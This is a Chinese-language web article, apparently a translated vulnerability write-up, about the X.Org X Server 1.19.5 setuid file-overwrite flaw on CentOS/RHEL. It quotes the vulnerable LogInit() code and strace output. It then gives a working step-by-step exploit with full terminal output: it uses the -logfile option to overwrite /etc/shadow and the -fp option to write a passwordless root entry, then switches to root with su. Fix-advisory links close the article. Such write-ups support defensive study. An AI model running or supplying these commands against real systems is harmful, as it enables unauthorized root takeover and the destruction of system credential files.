Xorg X Server權(quán)限提升漏洞是怎樣的，相信很多沒有經(jīng)驗的人對此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個問題。

從網(wǎng)站建設(shè)到定制行業(yè)解決方案，為提供網(wǎng)站制作、網(wǎng)站設(shè)計服務(wù)體系，各種行業(yè)企業(yè)客戶提供網(wǎng)站建設(shè)解決方案，助力業(yè)務(wù)快速發(fā)展。創(chuàng)新互聯(lián)將不斷加快創(chuàng)新步伐，提供優(yōu)質(zhì)的建站服務(wù)。

任意文件覆蓋導(dǎo)致的提權(quán)漏洞

由合天網(wǎng)安實驗室翻譯

描述：

X.org X Server應(yīng)用程序允許低權(quán)限的用戶在系統(tǒng)的任何位置創(chuàng)建或覆蓋文件，包括特色文件（如：/etc/shadow）。

攻擊條件：擁有普通用戶的控制臺會話權(quán)限

靶機：

1. CentOS-7

2. [narendra@localhost ~]$ uname -a

3. Linux localhost.localdomain 4.18.11-1.el7.elrepo.x86_64 #1 SMP Sat Sep 29 09:42:38 EDT 2018 x86_64 x86_64 xGNU/Linux

X.Org X server 版本：1.19.5

分析：

在CentOS和RedHat服務(wù)器操作系統(tǒng)上，X.org X Server 可執(zhí)行文件（/usr/bin/Xorg）具有SETUID權(quán)限。

1. [Dev@localhost ~]$ ls -la /usr/bin/Xorg

2. -rwsr-xr-x. 1 root root 2409344 Apr 11 22:12 /usr/bin/Xorg

X.org X Server 應(yīng)用程序中 LogInit()函數(shù)用來記錄日志，X.org X Server 允許用戶使用 “-logfile”選項指定日志文件。

如果系統(tǒng)上已存在與用戶提供的"”同名的文件，則將其重命名為“.old”。完成此操作后，將使用用戶提供的“”名稱創(chuàng)建一個新文件，使用fopen()函數(shù)進行調(diào)用

Xorg-Server/os/log.c

1.  244 const char *  

2.  245 LogInit(const char *fname, const char *backup)  

3.  246 {  

4.  247   char *logFileName = NULL;  

5.  248  

6.  249   if (fname && *fname) {  

7.  250     if (displayfd != -1) {  

8.  251       /* Display isn't set yet, so we can't use it in filenames yet. */  

9.  252       char pidstring[32];  

10.  253       snprintf(pidstring, sizeof(pidstring), "pid-%ld",  

11.  254           (unsigned long) getpid());  

12.  255       logFileName = LogFilePrep(fname, backup, pidstring);  

13.  256       saved_log_tempname = logFileName;  

14.  257  

15.  258       /* Save the patterns for use when the display is named. */  

16.  259       saved_log_fname = strdup(fname);  

17.  260       if (backup == NULL)  

18.  261         saved_log_backup = NULL;  

19.  262       else  

20.  263         saved_log_backup = strdup(backup);  

21.  264     } else  

22.  265       logFileName = LogFilePrep(fname, backup, display);  

23.  266     if ((logFile = fopen(logFileName, "w")) == NULL)  

24.  267       FatalError("Cannot open log file \"%s\"\n", logFileName);  

25.  268     setvbuf(logFile, NULL, _IONBF, 0);  

26.  269  

27.  270     logFileFd = fileno(logFile);  

可以使用 strace命令跟蹤系統(tǒng)底層的 open() 調(diào)用過程

1. stat("mylogfile", 0x7ffcb9654ed0)      &n-1 ENOENT (No such file or directory)

2. open("mylogfile", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4

3. rt_sigaction(SIGALRM, {0x55b6e2c2ca70, [ALRM], SA_RESTORER|SA_RESTART, 0x7fb0353036d0}, NULL, 8) = 0

從跟蹤日志可以看出，O_EXCL標(biāo)志沒有設(shè)置，所以fopen() 函數(shù)會創(chuàng)建或者覆蓋已有的文件。

漏洞利用：

主要利用以下3點：

1、fopen()調(diào)用的輸入是用戶可控的文件名

2、fopen()將創(chuàng)建或覆蓋已存在的文件

3、可執(zhí)行文件/usr/bin/Xorg具有setuid權(quán)限

/etc/shadow 文件覆蓋測試

1.  [Dev@localhost ~]$ uname -r

2.  3.10.0-862.el7.x86_64

3.  [Dev@localhost ~]$ Xorg -version

4.  X.Org X Server 1.19.5

5.  Release Date: 2017-10-12

6.  X Protocol Version 11, Revision 0

7.  Build Operating System:  2.6.32-696.18.7.el6.x86_64

8.  Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64

9.  Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8

10.  Build Date: 13 February 2018  02:39:52PM

11.  Build ID: xorg-x11-server 1.19.5-5.el7

12.  Current version of pixman: 0.34.0

13.  Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.

14.  [Dev@localhost ~]

15.  [Dev@localhost ~]$ id

16.  uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

17.  [Dev@localhost ~]$

18.  [Dev@localhost ~]$ cd /etc

19.  [Dev@localhost etc]$ ls -la shadow

20.  ----------. 1 root root 1650 Oct  6 05:03 shadow

21.  [Dev@localhost etc]$

22.  [Dev@localhost etc]$ cat shadow

23.  cat: shadow: Permission denied

24.  [Dev@localhost etc]$

25.  [Dev@localhost etc]$ Xorg -logfile shadow :1 #指定日志文件為shadow

26.  X.Org X Server 1.19.5

27.  Release Date: 2017-10-12

28.  X Protocol Version 11, Revision 0

29.  Build Operating System:  2.6.32-696.18.7.el6.x86_64

30.  Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64

31.  Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8

32.  Build Date: 13 February 2018  02:39:52PM

33.  Build ID: xorg-x11-server 1.19.5-5.el7

34.  Current version of pixman: 0.34.0

35.   Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.

36.  Markers: (--) probed, (**) from config file, (==) default setting,

37.      (++) from command line, (!!) notice, (II) informational,

38.      (WW) warning, (EE) error, (NI) not implemented, (??) unknown.

39.  (++) Log file: "shadow", Time: Sat Oct  6 21:54:13 2018

40.  (==) Using config directory: "/etc/X11/xorg.conf.d"

41.  (==) Using system config directory "/usr/share/X11/xorg.conf.d"

42.  ^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)

43.  (II) Server terminated successfully (0). Closing log file.

44.  [Dev@localhost etc]$

45.  [Dev@localhost etc]$

46.  [Dev@localhost etc]$ ls -la shadow

47.  -rw-r--r--. 1 root Dev 53901 Oct  6 21:54 shadow

48.  [Dev@localhost etc]$

49.  [Dev@localhost etc]$ head shadow #寫入成功

50.  [ 11941.870]

51.  X.Org X Server 1.19.5

52.  Release Date: 2017-10-12

53.  [ 11941.870] X Protocol Version 11, Revision 0

54.  [ 11941.870] Build Operating System:  2.6.32-696.18.7.el6.x86_64

55.  [ 11941.870] Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64

56.  [ 11941.870] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8

57.  [ 11941.870] Build Date: 13 February 2018  02:39:52PM

58.  [ 11941.870] Build ID: xorg-x11-server 1.19.5-5.el7

59.  [ 11941.870] Current version of pixman: 0.34.0

60.  [Dev@localhost etc]$

權(quán)限提升

1. [Dev@localhost ~]$ id #當(dāng)前權(quán)限

2.  uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

3.  [Dev@localhost ~]$

4.  [Dev@localhost ~]$ cd /etc

5.  [Dev@localhost etc]$

6.  [Dev@localhost etc]$ ls -la shadow

7.  ----------. 1 root root 1241 Oct 10 01:15 shadow

8.  [Dev@localhost etc]$

9.  [Dev@localhost etc]$ cat shadow #查看權(quán)限

10.  cat: shadow: Permission denied

11.  [Dev@localhost etc]$

12.  [Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1 #寫入文件，root無密碼

13.  X.Org X Server 1.19.5

14.  Release Date: 2017-10-12

15.  X Protocol Version 11, Revision 0

16.  Build Operating System:  3.10.0-693.17.1.el7.x86_64

17.  Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64

18.  Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.x86_64 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8

19.  Build Date: 11 April 2018  04:40:54PM

20.  Build ID: xorg-x11-server 1.19.5-5.el7

21.  Current version of pixman: 0.34.0

22.      Before reporting problems, check http://wiki.x.org

23.      to make sure that you have the latest version.

24.  Markers: (--) probed, (**) from config file, (==) default setting,

25.      (++) from command line, (!!) notice, (II) informational,

26.      (WW) warning, (EE) error, (NI) not implemented, (??) unknown.

27.  (++) Log file: "shadow", Time: Wed Oct 10 01:16:10 2018

28.  (==) Using config directory: "/etc/X11/xorg.conf.d"

29.  (==) Using system config directory "/usr/share/X11/xorg.conf.d"

30.  ^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)

31.  (II) Server terminated successfully (0). Closing log file.

32.  [Dev@localhost etc]$ ls -la shadow

33.  -rw-r--r--. 1 root Dev 53897 Oct 10 01:16 shadow

34.  [Dev@localhost etc]$

35.  [Dev@localhost etc]$ cat shadow | grep "root::" #寫入文件成功

36.      root::16431:0:99999:7:::

37.  [Dev@localhost etc]$

38.  [Dev@localhost etc]$

39.  [Dev@localhost etc]$ su #切換到root用戶

40.  [root@localhost etc]#

41.  [root@localhost etc]# id  #查看權(quán)限，提權(quán)成功

42.  uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

修復(fù)信息：

https://lists.x.org/archives/xorg-announce/2018-October/002927.htmlhttps://lists.x.org/archives/xorg-announce/2018-October/002928.html

看完上述內(nèi)容，你們掌握Xorg X Server權(quán)限提升漏洞是怎樣的的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！